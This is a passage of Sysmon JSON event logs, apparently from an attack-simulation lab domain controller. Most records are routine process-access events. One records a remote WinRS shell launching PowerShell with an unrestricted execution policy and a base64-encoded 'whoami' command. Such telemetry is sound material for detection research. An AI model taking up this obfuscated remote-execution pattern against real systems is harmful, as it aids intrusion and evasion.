06:49:52.411","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-001094CD0400}\r\nProcessId: 4896\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-1090-5F25-0000-002096CA0400}\r\nLogonId: 0x4CA96\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nParentProcessId: 4820\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-001094CD0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-1090-5F25-0000-002096CA0400}","LogonId":"0x4ca96","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","ParentProcessId":"4820","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nSourceProcessId: 4820\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001094CD0400}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","SourceProcessId":"4820","SourceThreadId":"4876","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001094CD0400}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001094CD0400}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001094CD0400}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 